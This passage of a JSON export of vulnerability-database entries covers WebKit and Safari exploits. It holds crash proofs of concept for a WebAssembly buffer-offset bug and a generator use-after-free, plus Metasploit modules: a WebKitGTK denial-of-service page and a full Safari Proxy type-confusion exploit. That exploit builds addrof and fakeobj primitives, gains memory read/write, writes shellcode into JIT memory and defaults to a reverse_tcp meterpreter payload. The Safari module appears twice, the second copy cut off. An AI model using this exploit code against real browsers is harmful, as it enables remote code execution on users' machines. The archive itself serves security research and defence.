follows:\r\n\r\nmemcpy(result.data(), data + byteOffset, byteSize);\r\n\r\nThis means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either though parsing exceptions or data sections when they are copied. A minimal PoC for the issue is:\r\n\r\nvar b2 = new ArrayBuffer(1000);\r\nvar view = new Int8Array(b2, 700);\r\nvar mod = new WebAssembly.Module(a);\r\n\r\nAn HTML file the consistently crashes Safari is attached.\r\n-->\r\n\r\n<html><body><script>\r\nfor(var q = 0; q < 100; q++){\r\nvar i = Math.random();\r\ni = Math.round(i*0x20000000);\r\ni = Math.abs(i);\r\nvar b2 = new Uint8Array( i);\r\nconsole.log(\"i\" + i);\r\nvar j = Math.random();\r\nj = j*i;\r\nj = Math.round(j);\r\nj = Math.abs(j);\r\nconsole.log(\"j\"+j)\r\nvar view2 = new DataView(b2.buffer,j);\r\ntry{\r\nvar mod = new WebAssembly.Module(view2);\r\n}catch(e){\r\nconsole.log(e);\r\n}\r\n}\r\n</script></body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44859/"}, {"lastseen": "2018-06-08T18:24:45", "description": "WebKit - Use-After-Free when Resuming Generator. CVE-2018-4218. Dos exploit for Multiple platform. Tags: Use After Free (UAF)", "published": "2018-06-08T00:00:00", "type": "exploitdb", "title": "WebKit - Use-After-Free when Resuming Generator", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4218"], "modified": "2018-06-08T00:00:00", "id": "EDB-ID:44861", "href": "https://www.exploit-db.com/exploits/44861/", "sourceData": "<!--\r\nIn WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:\r\n\r\n var state = this.@generatorState;\r\n\r\nand set by calling:\r\n\r\n generator.@generatorState = @GeneratorStateExecuting;\r\n\r\n\r\nChecking that the @generator property is set is also used in place of type checking the generator.\r\n\r\nTherefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.\r\n\r\nIt is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.\r\n\r\nGenerators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.\r\n\r\nA minimal sample of the script causing this problem is below, and a full PoC is attached.\r\n\r\nvar iterator;\r\n\r\nvar a = [];\r\n\r\nfunction* foo(index) {\r\n\r\n while (1) {\r\n var q = a.pop();\r\n if(q){\r\n \tq.__proto__ = iterator;\r\n \t q.next();\r\n }\r\n yield index++;\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n yield;\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){ // make a few objects with @generatorState set\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n\r\niterator = foo(0);\r\n\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next().value);\r\n-->\r\n\r\n<html><body><script>\r\nprint = console.log;\r\nprint(\"top\");\r\nvar iterator;\r\nvar o = function(){print(\"hello\")};\r\nvar a = [];\r\nfunction* foo(index) {\r\n //print(\"start\");\r\n\r\n while (1) {\r\n //if(index == 77){\r\n // o = 0;\r\n // gc(); \r\n//\tindex = 2;\r\n // var a = [1, 2, 3, 4];\r\n\t//yield 9;\r\n //print(\"a vale \" + a[0]);\r\n //}\r\n //if(index == 1){\r\n //index = 77;\r\n // print(\"INTERNAL CALL\")\r\n // iterator.next();\r\n //index++;\r\n\r\n //}\r\n //var b = [1, 2, 3, 4];\r\n var q = a.pop();\r\n if(q){\r\n print(\"here1\");\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n //print(\"bval\" + b[0]);\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n\r\n yield;\r\n\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){\r\n\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n//print(a);\r\niterator = foo(0);\r\n\r\n\r\n// expected output: 0\r\n\r\n\r\n\r\n\r\no.__proto__ = iterator;\r\n//print(\"FIRST CALL\")\r\n//print(o.next().value);\r\n//print(\"SECOND CALL\")\r\n//print(o.next().value);\r\n//print(\"THIRD CALL\")\r\n\r\nfor(var i = 0; i < 10; i++){\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next(\"hello\").value);\r\n}\r\n\r\n//print(\"FOURTH CALL\")\r\n//print(iterator.next().value);\r\no();\r\n</script></body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44861/"}, {"lastseen": "2018-12-16T01:04:15", "description": "", "published": "2018-12-14T00:00:00", "type": "exploitdb", "title": "Safari - Proxy Object Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-14T00:00:00", "id": "EDB-ID:45998", "href": "https://www.exploit-db.com/exploits/45998", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The JIT region is then replaced with shellcode which loads the second stage.\r\n The second stage exploits a logic error in libxpc, which uses command execution\r\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'saelo' ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2018-4404'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/saelo/pwn2own2018'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ],\r\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\r\n 'Platform' => 'osx',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\r\n 'Targets' => [\r\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\r\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\r\n ],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\r\n ])\r\n end\r\n\r\n def offset_table\r\n {\r\n '10.12.6' => {\r\n :jsc_vtab => '0x0000d8d8',\r\n :dyld_stub_loader => '0x00001168',\r\n :dlopen => '0x000027f7',\r\n :confstr => '0x00002c84',\r\n :strlen => '0x00001b40',\r\n :strlen_got => '0xdc0',\r\n },\r\n '10.13' => {\r\n :jsc_vtab => '0x0000e5f8',\r\n :dyld_stub_loader => '0x000012a8',\r\n :dlopen => '0x00002e60',\r\n :confstr => '0x000024fc',\r\n :strlen => '0x00001440',\r\n :strlen_got => '0xee8',\r\n },\r\n '10.13.3' => {\r\n :jsc_vtab => '0xe5e8',\r\n :dyld_stub_loader => '0x1278',\r\n :dlopen => '0x2e30',\r\n :confstr => '0x24dc',\r\n :strlen => '0x1420',\r\n :strlen_got => '0xee0',\r\n },\r\n }\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\r\n ::File.binread path\r\n end\r\n\r\n def stage1_js\r\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\r\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\r\n end\r\n\r\n def stage2_js\r\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\r\n payload_cmd = payload.raw\r\n if target['Arch'] == ARCH_PYTHON\r\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\r\n end\r\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\r\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\r\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\r\n end\r\n\r\n def get_offsets(user_agent)\r\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\r\n version = $1.gsub(\"_\", \".\")\r\n mac_osx_version = Gem::Version.new(version)\r\n if mac_osx_version >= Gem::Version.new('10.13.4')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif mac_osx_version < Gem::Version.new('10.12')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif offset_table.key?(version)\r\n offset = offset_table[version]\r\n return <<-EOF\r\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\r\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\r\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\r\nconst CONFSTR_OFFSET = #{offset[:confstr]};\r\nconst STRLEN_OFFSET = #{offset[:strlen]};\r\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\r\nEOF\r\n else\r\n print_warning \"No offsets for version #{mac_osx_version}\"\r\n end\r\n else\r\n print_warning \"Unexpected User-Agent\"\r\n end\r\n return false\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n user_agent = request['User-Agent']\r\n print_status(\"Request from #{user_agent}\")\r\n offsets = get_offsets(user_agent)\r\n unless offsets\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n#{stage1_js}\r\nstage1.replace = function(oldVal, newVal) {\r\n for (var idx = 0; idx < this.length; idx++) {\r\n var found = true;\r\n for (var j = idx; j < idx + 8; j++) {\r\n if (this[j] != oldVal.byteAt(j - idx)) {\r\n found = false;\r\n break;\r\n }\r\n }\r\n if (found)\r\n break;\r\n }\r\n this.set(newVal.bytes(), idx);\r\n};\r\n#{stage2_js}\r\n#{utils}\r\n#{int64}\r\n#{offsets}\r\n\r\nvar ready = new Promise(function(resolve) {\r\n if (typeof(window) === 'undefined')\r\n resolve();\r\n else\r\n window.onload = function() {\r\n resolve();\r\n }\r\n});\r\n\r\nready = Promise.all([ready]);\r\n\r\nprint = function(msg) {\r\n //console.log(msg);\r\n //document.body.innerText += msg + '\\\\n';\r\n}\r\n\r\n// Must create this indexing type transition first,\r\n// otherwise the JIT will deoptimize later.\r\nvar a = [13.37, 13.37];\r\na[0] = {};\r\n\r\nvar referenceFloat64Array = new Float64Array(0x1000);\r\n\r\n//\r\n// Bug: the DFG JIT does not take into account that, through the use of a\r\n// Proxy, it is possible to run arbitrary JS code during the execution of a\r\n// CreateThis operation. This makes it possible to change the structure of e.g.\r\n// an argument without causing a bailout, leading to a type confusion.\r\n//\r\n\r\n//\r\n// addrof primitive\r\n//\r\nfunction setupAddrof() {\r\n function InfoLeaker(a) {\r\n this.address = a[0];\r\n }\r\n\r\n var trigger = false;\r\n var leakme = null;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = leakme;\r\n return target[propname];\r\n },\r\n };\r\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(obj) {\r\n leakme = obj;\r\n arg = [1.1, 1.1];\r\n var o = new InfoLeakerProxy(arg);\r\n return o.address;\r\n };\r\n}\r\n\r\n//\r\n// fakeobj primitive\r\n//\r\nfunction setupFakeobj() {\r\n function ObjFaker(a, address) {\r\n a[0] = address;\r\n }\r\n\r\n var trigger = false;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = {};\r\n return target[propname];\r\n },\r\n };\r\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(address) {\r\n arg = [1.1, 1.1];\r\n var o = new ObjFakerProxy(arg, address);\r\n return arg[0];\r\n };\r\n}\r\n\r\nfunction makeJITCompiledFunction() {\r\n // Some code to avoid inlining...\r\n function target(num) {\r\n for (var i = 2; i < num; i++) {\r\n if (num % i === 0) {\r\n return false;\r\n }\r\n }\r\n return true;\r\n }\r\n\r\n // Force JIT compilation.\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n return target;\r\n}\r\n\r\nfunction pwn() {\r\n // Spray Float64Array structures so that structure ID 0x1000 will\r\n // be a Float64Array with very high probability\r\n var structs = [];\r\n for (var i = 0; i < 0x1000; i++) {\r\n var a = new Float64Array(1);\r\n a['prop' + i] = 1337;\r\n structs.push(a);\r\n }\r\n\r\n // Setup exploit primitives\r\n var addrofOnce = setupAddrof();\r\n var fakeobjOnce = setupFakeobj();\r\n\r\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\r\n /*\r\n var stuff = [];\r\n for (var i = 0; i < 0x100000; i++) {\r\n stuff.push({foo: i});\r\n }\r\n */\r\n\r\n var float64MemView = new Float64Array(0x200);\r\n var uint8MemView = new Uint8Array(0x1000);\r\n\r\n // Setup container to host the fake Float64Array\r\n var jsCellHeader = new Int64([\r\n 00, 0x10, 00, 00, // m_structureID\r\n 0x0, // m_indexingType\r\n 0x2b, // m_type\r\n 0x08, // m_flags\r\n 0x1 // m_cellState\r\n ]);\r\n\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: null,\r\n vector: float64MemView,\r\n length: (new Int64('0x0001000000001337')).asJSValue(),\r\n mode: {}, // an empty object, we'll need that later\r\n };\r\n\r\n // Leak address and inject fake object\r\n // RawAddr == address in float64 form\r\n var containerRawAddr = addrofOnce(container);\r\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\r\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\r\n\r\n ///\r\n /// BEGIN CRITICAL SECTION\r\n ///\r\n /// Objects are corrupted, a GC would now crash the process.\r\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\r\n ///\r\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\r\n while (!(driver instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue();\r\n }\r\n\r\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\r\n // property of the container to leak addresses.\r\n driver[2] = containerRawAddr;\r\n var emptyObjectRawAddr = float64MemView[6];\r\n container.mode = referenceFloat64Array;\r\n var referenceFloat64ArrayRawAddr = float64MemView[6];\r\n\r\n // Fixup the JSCell header of the container to make it look like an empty object.\r\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\r\n driver[2] = emptyObjectRawAddr;\r\n var header = float64MemView[0];\r\n driver[2] = containerRawAddr;\r\n float64MemView[0] = header;\r\n\r\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\r\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\r\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\r\n driver[2] = referenceFloat64ArrayRawAddr;\r\n var header = float64MemView[0];\r\n var length = float64MemView[3];\r\n var mode = float64MemView[4];\r\n driver[2] = containerRawAddr;\r\n float64MemView[2] = header;\r\n float64MemView[3] = 0;\r\n float64MemView[5] = length;\r\n float64MemView[6] = mode;\r\n\r\n // Root the container object so it isn't garbage collected.\r\n // This will allocate a butterfly for the fake object and store a reference to the container there.\r\n // The fake array itself is rooted by the memory object (closures).\r\n driver.container = container;\r\n\r\n ///\r\n /// END CRITICAL SECTION\r\n ///\r\n /// Objects are repaired, we will now survive a GC\r\n ///\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n\r\n memory = {\r\n read: function(addr, length) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++)\r\n a[i] = uint8MemView[i];\r\n return a;\r\n },\r\n\r\n write: function(addr, data) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n for (var i = 0; i < data.length; i++)\r\n uint8MemView[i] = data[i];\r\n },\r\n\r\n read8: function(addr) {\r\n driver[2] = addr.asDouble();\r\n return Int64.fromDouble(float64MemView[0]);\r\n },\r\n\r\n write8: function(addr, value) {\r\n driver[2] = addr.asDouble();\r\n float64MemView[0] = value.asDouble();\r\n },\r\n\r\n addrof: function(obj) {\r\n float64MemView.leakme = obj;\r\n var butterfly = Int64.fromDouble(driver[1]);\r\n return memory.read8(Sub(butterfly, 0x10));\r\n },\r\n };\r\n\r\n print(\"[+] Got stable memory read/write!\");\r\n\r\n // Find binary base\r\n var funcAddr = memory.addrof(Math.sin);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n var codeAddr = memory.read8(Add(executableAddr, 24));\r\n var vtabAddr = memory.read8(codeAddr);\r\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\r\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\r\n\r\n var dyldStubLoaderAddr = memory.read8(jscBase);\r\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\r\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\r\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\r\n print(\"[*] dyld.dylib @ \" + dyldBase);\r\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\r\n\r\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\r\n print(\"[*] confstr @ \" + confstrAddr);\r\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\r\n print(\"[*] dlopen @ \" + dlopenAddr);\r\n\r\n // Patching shellcode\r\n var stage2Addr = memory.addrof(stage2);\r\n stage2Addr = memory.read8(Add(stage2Addr, 16));\r\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\r\n\r\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\r\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\r\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\r\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\r\n print(\"[+] Shellcode patched\");\r\n\r\n // Leak JITCode pointer poison value\r\n var poison_addr = Add(jscBase, 305152);\r\n print(\"[*] Poison value @ \" + poison_addr);\r\n var poison = memory.read8(poison_addr);\r\n print(\"[*] Poison value: \" + poison);\r\n\r\n // Shellcode\r\n var func = makeJITCompiledFunction();\r\n var funcAddr = memory.addrof(func);\r\n print(\"[+] Shellcode function object @ \" + funcAddr);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n print(\"[+] Executable instance @ \" + executableAddr);\r\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\r\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\r\n\r\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\r\n var codeAddr = Xor(codeAddrPoisoned, poison);\r\n print(\"[+] RWX memory @ \" + codeAddr.toString());\r\n print(\"[+] Writing shellcode...\");\r\n var origCode = memory.read(codeAddr, stage1.length);\r\n memory.write(codeAddr, stage1);\r\n\r\n print(\"[!] Jumping into shellcode...\");\r\n var res = func();\r\n if (res === 0) {\r\n print(\"[+] Shellcode executed sucessfully!\");\r\n } else {\r\n print(\"[-] Shellcode failed to execute: error \" + res);\r\n }\r\n\r\n memory.write(codeAddr, origCode);\r\n print(\"[*] Restored previous JIT code\");\r\n\r\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n}\r\n\r\nready.then(function() {\r\n try {\r\n pwn();\r\n } catch (e) {\r\n print(\"[-] Exception caught: \" + e);\r\n }\r\n}).catch(function(err) {\r\n print(\"[-] Initializatin failed\");\r\n});\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45998"}], "metasploit": [{"lastseen": "2020-10-09T18:28:49", "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.\n", "published": "2018-06-09T06:13:47", "type": "metasploit", "title": "WebKitGTK+ WebKitFaviconDatabase DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/WEBKITPLUS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\n 'Description' => %q(\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Dhiraj Mishra', # Original discovery, disclosure\n 'Hardik Mehta', # Original discovery, disclosure\n 'Zubin Devnani', # Original discovery, disclosure\n 'Manuel Caballero' #JS Code\n ],\n 'References' => [\n ['EDB', '44842'],\n ['CVE', '2018-11646'],\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\n ],\n 'DisclosureDate' => '2018-06-03',\n 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],\n 'PassiveActions' => [ 'WebServer' ],\n 'DefaultAction' => 'WebServer'\n )\n )\n end\n\n def run\n exploit # start http server\n end\n\n def setup\n @html = <<-JS\n<script type=\"text/javascript\">\n win = window.open(\"WIN\", \"WIN\");\n window.open(\"http://example.com/\", \"WIN\");\n win.document.execCommand('stop');\n win.document.write(\"HelloWorld\");\n win.document.close();\n</script>\n JS\n end\n\n def on_request_uri(cli, _request)\n print_status('Sending response')\n send_response(cli, @html)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/webkitplus.rb"}, {"lastseen": "2020-10-14T01:51:02", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. The second stage exploits a logic error in libxpc, which uses command execution via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n", "published": "2018-11-15T00:44:18", "type": "metasploit", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2018-4404"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n :jsc_vtab => '0x0000d8d8',\n :dyld_stub_loader => '0x00001168',\n :dlopen => '0x000027f7',\n :confstr => '0x00002c84',\n :strlen => '0x00001b40',\n :strlen_got => '0xdc0',\n },\n '10.13' => {\n :jsc_vtab => '0x0000e5f8',\n :dyld_stub_loader => '0x000012a8',\n :dlopen => '0x00002e60',\n :confstr => '0x000024fc',\n :strlen => '0x00001440',\n :strlen_got => '0xee8',\n },\n '10.13.3' => {\n :jsc_vtab => '0xe5e8',\n :dyld_stub_loader => '0x1278',\n :dlopen => '0x2e30',\n :confstr => '0x24dc',\n :strlen => '0x1420',\n :strlen_got => '0xee0',\n },\n }\n end\n\n def stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n osx_version = $1.gsub(\"_\", \".\")\n if user_agent =~ /Version\\/(.*?) /\n if Gem::Version.new($1) >= Gem::Version.new('11.1.1')\n print_warning \"Safari version #{$1} is not vulnerable\"\n return false\n else\n print_good \"Safari version #{$1} appears to be vulnerable\"\n end\n end\n mac_osx_version = Gem::Version.new(osx_version)\n if mac_osx_version >= Gem::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Gem::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(osx_version)\n offset = offset_table[osx_version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = 